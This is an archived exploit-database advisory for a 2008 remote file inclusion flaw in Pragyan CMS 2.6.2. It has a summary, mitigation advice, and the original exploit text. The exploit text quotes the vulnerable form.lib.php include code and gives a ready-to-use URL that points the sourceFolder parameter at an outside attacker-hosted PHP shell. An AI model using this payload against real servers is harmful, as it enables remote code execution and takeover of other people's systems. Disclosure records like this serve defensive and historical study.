pragyan 2.6.2 Remote File Inclusion

vendor:

Pragyan

by:

N3TR00T3R

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Pragyan

Affected Version From: 2.6.2002

Affected Version To: 2.6.2002

Patch Exists: YES

Related CWE: N/A

CPE: a:pragyan:pragyan:2.6.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

pragyan 2.6.2 Remote File Inclusion

A remote file inclusion vulnerability exists in Pragyan 2.6.2. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system. The vulnerability is due to the application failing to properly sanitize user-supplied input to the 'sourceFolder' parameter in the 'form.lib.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing a URL in the 'sourceFolder' parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of Pragyan.

Source

Exploit-DB raw data:

                                         << In The Name Of GOD >>


                  -------------------------------------------------------------
                   -               [ Persian Boys Hacking Team ] -:- 2008
                   -
                   - discovered by N3TR00T3R [at] Y! [dot] com
                   - pragyan 2.6.2 Remote File Includion
                   - download :http://sourceforge.net/project/showfiles.php?group_id=220286 
                   - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
                              r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
                              Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
                            [www.Persian-Boys.com] & [www.irchatan.com]
                  --------------------------------------------------------------

if register_globals = On;


Vul Code : [/cms/modules/form.lib.php]
##########################################################
#global $sourceFolder;
#global $moduleFolder;
#require_once("$sourceFolder/$moduleFolder/form/editform.php");
#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
##########################################################

Exploit : 

##########################################################
#
# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
#
##########################################################

# milw0rm.com [2008-07-15]